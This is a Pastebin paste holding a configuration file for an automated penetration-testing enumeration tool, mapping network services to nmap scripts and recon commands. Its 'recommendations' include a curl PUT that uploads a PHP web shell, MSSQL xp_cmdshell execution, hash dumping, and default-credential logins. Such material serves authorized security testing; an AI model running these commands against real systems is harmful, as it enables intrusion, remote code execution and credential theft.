API tools faq
paste
opexxx

discover.txt

opexxx
Aug 24th, 2020
224
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 7.56 KB | None | 0 0
raw download clone embed print report
  1. [ftp] # 20, 21
  2. nmap-service-names = [
  3. "ftp",
  4. "ftp-data"
  5. ]
  6.  
  7. recommendations = [
  8. # none
  9. ]
  10.  
  11. [ftp.scans]
  12. nmap = "nmap -vv -Pn -p <ports> --script=ftp-anon,ftp-bounce,ftp-libopie,ftp-proftpd-backdoor,ftp-syst,ftp-vsftpd-backdoor,ftp-vuln-cve2010-4221 <target> -oN <fout>"
  13.  
  14.  
  15. [ssh] # 22
  16. nmap-service-names = [
  17. "ssh"
  18. ]
  19.  
  20. recommendations = [
  21. # none
  22. ]
  23.  
  24. [ssh.scans]
  25. nmap = "nmap -vv -Pn -p <ports> --script=ssh2-enum-algos,ssh-hostkey,ssh-auth-methods <target> -oN <fout>"
  26.  
  27.  
  28. [telnet] # 23
  29. nmap-service-names = [
  30. "telnet"
  31. ]
  32.  
  33. recommendations = [
  34. "telnet <target> <port>"
  35. ]
  36.  
  37. [telnet.scans]
  38. nmap = "nmap -vv -Pn -p <ports> --script=telnet-encryption,telnet-ntlm-info <target> -oN <fout>"
  39.  
  40.  
  41. [smtp] # 25
  42. nmap-service-names = [
  43. "smtp"
  44. ]
  45.  
  46. recommendations = [
  47. "telnet <target> <port>"
  48. ]
  49.  
  50. [smtp.scans]
  51. nmap = "nmap -vv -Pn -p <ports> --script=smtp-ntlm-info,smtp-vuln-cve2010-4344,smtp-vuln-cve2011-1720,smtp-vuln-cve2011-1764 <target> -oN <fout>"
  52. smtpuserenum = "smtp-user-enum -M VRFY -U <userlist> -t <target> 2>&1 | tee <fout>"
  53.  
  54.  
  55. [dns] # 53
  56. nmap-service-names = [
  57. "domain"
  58. ]
  59.  
  60. recommendations = [
  61. "nslookup"
  62. ]
  63.  
  64. [dns.scans]
  65. dnsrecon = "dnsrecon -t axfr <target> 2>&1 | tee <fout>"
  66. host = "host -t ns <target> 2>&1 | tee <fout>"
  67. nmap = "nmap -v -Pn -p <ports> --script=dns-service-discovery,dns-cache-snoop,dns-check-zone,dns-zone-transfer <target> -oN <fout>"
  68.  
  69.  
  70. [tftp] # 69
  71. nmap-service-names = [
  72. "tftp"
  73. ]
  74.  
  75. recommendations = [
  76. "tftp <target>:<port>"
  77. ]
  78.  
  79. [tftp.scans]
  80. nmap = "nmap -vv -sU -Pn -p <ports> --script=tftp-enum <target> -oN <fout>"
  81.  
  82.  
  83. [http] # 80, 591
  84. nmap-service-names = [
  85. "http",
  86. "http-alt"
  87. ]
  88.  
  89. recommendations = [
  90. "curl -v -X OPTIONS http://<target>:<port>/<directory>",
  91. "curl -v -X PUT -d '<?php echo shell_exec($_GET[\"cmd\"]);?>' http://<target>:<port>/<directory>/webshell.php",
  92. "dirb http://<target>:<port>/",
  93. "dotdotpwn -m http -h <target> -x <port> -f <pathtoretrieve> -k <keywordthatmustbepresent> -d <depth> -t <millisperrequest> -s",
  94. "wafw00f http://<target>:/<port>/",
  95. "nmap -Pn -p <ports> --script http-adobe-coldfusion-apsa1301,http-coldfusion-subzero,http-vuln-cve2009-3960,http-vuln-cve2010-2861 <target> -oN <fout>",
  96. "wpscan --url http://<target>:<port>/",
  97. "wpscan --url http://<target>:<port>/ --enumerate vp"
  98. ]
  99.  
  100. [http.scans]
  101. nikto = "nikto -host <target> -port <ports> 2>&1 | tee <fout>"
  102. nmap = "nmap -vv -Pn -p <ports> --script=http-vuln* <target> -oN <fout>"
  103. gobuster = "gobuster -e -w <wordlist> -u http://<target>:<port>/ 2>&1 | tee <fout>"
  104.  
  105.  
  106. [kerberos]
  107. nmap-service-names = [
  108. "kerberos",
  109. "kerberos-sec"
  110. ]
  111.  
  112. recommendations = [
  113. # none
  114. ]
  115.  
  116. [kerberos.scans]
  117. nmap = "nmap -vv -Pn -p <ports> --script=krb5-enum-users <target> -oN <fout>"
  118.  
  119.  
  120. [https] # 443
  121. nmap-service-names = [
  122. "https",
  123. "ssl/http",
  124. "ssl/http-alt"
  125. ]
  126.  
  127. recommendations = [
  128. # none
  129. ]
  130.  
  131. [https.scans]
  132. nikto = "nikto -host <target> -port <ports> -ssl 2>&1 | tee <fout>"
  133. nmap = "nmap -vv -Pn -p <ports> --script=ssl-ccs-injection,ssl-cert,ssl-date,ssl-enum-ciphers,ssl-heartbleed,ssl-known-key,ssl-poodle <target> -oN <fout>"
  134. gobuster = "gobuster -e -w <wordlist> -u https://<target>:<port>/ 2>&1 | tee <fout>"
  135.  
  136.  
  137. [pop3] # 110
  138. nmap-service-names = [
  139. "pop3"
  140. ]
  141.  
  142. recommendations = [
  143. "telnet <target> <port>"
  144. ]
  145.  
  146. [pop3.scans]
  147. nmap = "nmap -vv -Pn -p <ports> --script=pop3-capabilities,pop3-ntlm-info <target> -oN <fout>"
  148.  
  149.  
  150. [smb] # 139, 445
  151. nmap-service-names = [
  152. "microsoft-ds",
  153. "netbios-ssn"
  154. ]
  155.  
  156. recommendations = [
  157. "nmap -vv -sU --script=nbstat -p <ports> <target>",
  158. "crackmapexec smb <target> -u <user> -p <pass> --spider C\\$ --pattern <pattern>",
  159. "crackmapexec smb <target> -u '' -p ''",
  160. "crackmapexec smb <target> -u '' -p '' --local-auth",
  161. "smbclient -L <target>",
  162. "smbclient \\\\<target>\\<share>"
  163. ]
  164.  
  165. [smb.scans]
  166. "nmap.tcp" = "nmap -vv -Pn -p <ports> --script smb-vuln* <target> -oN <fout>"
  167. enum4linux = "enum4linux -a <target> 2>&1 | tee <fout>"
  168.  
  169.  
  170. [imap] # 143, 220, 585, 993
  171. nmap-service-names = [
  172. "imap",
  173. "imap3",
  174. "imap4-ssl",
  175. "imaps"
  176. ]
  177.  
  178. recommendations = [
  179. "telnet <target> <port>"
  180. ]
  181.  
  182. [imap.scans]
  183. nmap = "nmap -vv -Pn -p <ports> --script=imap-capabilities,imap-ntlm-info <target> -oN <fout>"
  184.  
  185.  
  186. [msrpc]
  187. nmap-service-names = [
  188. "epmap",
  189. "msrpc",
  190. "rpcbind",
  191. "sunrpc",
  192. "erpc"
  193. ]
  194.  
  195. recommendations = [
  196. "rpcclient -U '' <target>",
  197. "rpcinfo -p <target>",
  198. "showmount -e <target>"
  199. ]
  200.  
  201. [msrpc.scans]
  202. nmap = "nmap -vv -Pn -p <ports> --script=msrpc-enum <target> -oN <fout>"
  203.  
  204.  
  205. [snmp] # 161
  206. nmap-service-names = [
  207. "snmp"
  208. ]
  209.  
  210. recommendations = [
  211. # none
  212. ]
  213.  
  214. [snmp.scans]
  215. nmap = "nmap -vv -Pn -p <ports> --script=snmp-netstat,snmp-processes <target> -oN <fout>"
  216. onesixtyone = "onesixtyone <target> 2>&1 | tee <fout>"
  217. snmpwalk = "snmpwalk -c public -v1 <target> 2>&1 | tee <fout>"
  218.  
  219.  
  220. [ldap] # 389
  221. nmap-service-names = [
  222. "ldap"
  223. ]
  224.  
  225. recommendations = [
  226. # none
  227. ]
  228.  
  229. [ldap.scans]
  230. enum4linux = "enum4linux -l <target> 2>&1 | tee <fout>"
  231.  
  232.  
  233. [cups]
  234. nmap-service-names = [
  235. "ipp"
  236. ]
  237.  
  238. recommendations = [
  239. # none
  240. ]
  241.  
  242. [cups.scans]
  243. nmap = "nmap -vv -Pn -p <ports> --script=cups-info,cups-queue-info <target> -oN <fout>"
  244.  
  245.  
  246. [rmi] # 1033
  247. nmap-service-names = [
  248. "java-rmi",
  249. "rmiregistry"
  250. ]
  251.  
  252. recommendations = [
  253. # none
  254. ]
  255.  
  256. [rmi.scans]
  257. nmap = "nmap -vv -Pn -p <ports> --script=rmi-vuln-classloader,rmi-dumpregistry <target> -oN <fout>"
  258.  
  259.  
  260. [mssql] # 1433, 1434
  261. nmap-service-names = [
  262. "ms-sql",
  263. "ms-sql-s"
  264. ]
  265.  
  266. recommendations = [
  267. "nmap -vv -Pn -p <port> --script=ms-sql-dump-hashes --script-args='mssql.username=<user>,mssql.password=<password>,mssql.instance-port=<port>' <target>",
  268. "nmap -vv -Pn -p <port> --script ms-sql-xp-cmdshell --script-args='mssql.username=<user>,mssql.password=<password>,mssql.instance-port=<port>,ms-sql-xp-cmdshell.cmd=\"<cmd>\"' <target>",
  269. "sqsh -S <target>:<port> -U <user>"
  270. ]
  271.  
  272. [mssql.scans]
  273. nmap = "nmap -vv -Pn -p <ports> --script=ms-sql-config,ms-sql-dump-hashes,ms-sql-empty-password,ms-sql-info,ms-sql-ntlm-info,ms-sql-tables <target> -oN <fout>"
  274.  
  275.  
  276. [oracle] # 1521
  277. nmap-service-names = [
  278. "oracle",
  279. "oracle-tns"
  280. ]
  281.  
  282. recommendations = [
  283. # none
  284. ]
  285.  
  286. [oracle.scans]
  287. nmap = "nmap -vv -Pn -p <ports> --script=oracle-enum-users,oracle-tns-version <target> -oN <fout>"
  288.  
  289.  
  290. [mysql] # 3306
  291. nmap-service-names = [
  292. "mysql"
  293. ]
  294.  
  295. recommendations = [
  296. "mysql -u root -proot <target>"
  297. ]
  298.  
  299. [mysql.scans]
  300. nmap = "nmap -vv -Pn -p <ports> --script=mysql-variables,mysql-vuln-cve2012-2122,mysql-info,mysql-users,mysql-enum,mysql-databases,mysql-dump-hashes <target> -oN <fout>"
  301.  
  302.  
  303. [remotedesktop] # 3389
  304. nmap-service-names = [
  305. "ms-wbt-server",
  306. "msrdp"
  307. ]
  308.  
  309. recommendations = [
  310. "rdesktop -u Administrator -p administrator <target>:<port>"
  311. ]
  312.  
  313. [remotedesktop.scans]
  314. nmap = "nmap -vv -Pn -p <ports> --script=rdp-enum-encryption,rdp-vuln-ms12-020 <target> -oN <fout>"
  315.  
  316.  
  317. [vnc]
  318. nmap-service-names = [
  319. "vnc"
  320. ]
  321.  
  322. recommendations = [
  323. # none
  324. ]
  325.  
  326. [vnc.scans]
  327. nmap = "nmap -vv -Pn -p <ports> --script=vnc-info,vnc-title <target> -oN <fout>"
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!